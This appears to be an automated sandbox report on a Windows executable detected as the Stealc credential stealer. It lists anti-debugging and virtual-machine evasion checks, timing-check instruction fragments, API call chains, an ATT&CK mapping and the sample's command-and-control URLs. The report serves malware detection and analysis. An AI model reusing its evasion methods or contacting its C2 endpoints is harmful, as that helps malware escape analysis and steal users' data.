                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2005 second address: 9E200B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E4293 second address: 9E4297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E4297 second address: 9E429D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E429D second address: 9E42A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E42A3 second address: 9E42B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB915C64Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E42B3 second address: 9E42C3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8FB8B0B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E42C3 second address: 9E42C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E42C7 second address: 9E42CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E42CB second address: 9E42F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8FB915C657h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E42F0 second address: 9E42FC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8FB8B0B4A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E42FC second address: 9E4302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8B61 second address: 9E8B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8B66 second address: 9E8B6B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F811F second address: 9F8125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8125 second address: 9F8129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8858 second address: 9F885C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F89ED second address: 9F89F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F89F2 second address: 9F8A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4AAh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8FB8B0B4B5h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC3F1 second address: 9FC40E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8FB915C655h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC40E second address: 9FC41A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8FB8B0B4A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC41A second address: 9FC420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC0F8 second address: 9FC111 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4B3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC111 second address: 9FC11B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8FB915C646h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04CED second address: A04CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04CF3 second address: A04CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08B05 second address: A08B09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C0B8 second address: A1C0D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Bh 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C0D3 second address: A1C0D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C0D9 second address: A1C0DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1BC8C second address: A1BC92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1BC92 second address: A1BC98 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1BC98 second address: A1BCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1BDD3 second address: A1BDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1BDD7 second address: A1BDDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C14B second address: A2C150 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C150 second address: A2C158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C978 second address: A2C97D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E75D second address: A2E783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4ACh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F8FB8B0B4AFh 0x00000011 pop esi 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A327DE second address: A327E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A327E4 second address: A327FA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8FB8B0B4A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jbe 00007F8FB8B0B4AEh 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A329E4 second address: A329ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32A56 second address: A32AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8FB8B0B4B2h 0x0000000f nop 0x00000010 mov edx, dword ptr [ebp+122D3912h] 0x00000016 push 00000004h 0x00000018 mov dx, di 0x0000001b push B7B01F10h 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007F8FB8B0B4B9h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32AAE second address: A32AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB915C64Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32AC0 second address: A32AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 94674C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 79F52A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 96ACBC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7A1AD1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9D6893 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00554910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0054DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0054E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00554570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0054ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0054BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0054DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0054F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00553EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00541160 GetSystemInfo,ExitProcess,0_2_00541160
                Source: file.exe, file.exe, 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwaregS
                Source: file.exe, 00000000.00000002.2223874889.0000000001294000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2223874889.0000000001264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2223874889.0000000001294000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWb
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13659
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13656
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13678
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13670
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13710
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005445C0 VirtualProtect ?,00000004,00000100,000000000_2_005445C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00559860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559750 mov eax, dword ptr fs:[00000030h]0_2_00559750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00557850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6444, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00559600
                Source: file.exe, file.exe, 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: i+cProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00557B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00556920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00556920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00557850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00557A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00557A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2182541833.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6444, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2182541833.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6444, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe45%ReversingLabsWin32.Trojan.Generic
                file.exe51%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpz9jv%file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpn9fv&file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37efile.exe, 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/wsfile.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      • URL Reputation: malware
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phptopfile.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.37
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1533036
                        Start date and time:2024-10-14 11:02:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 1s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 88
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
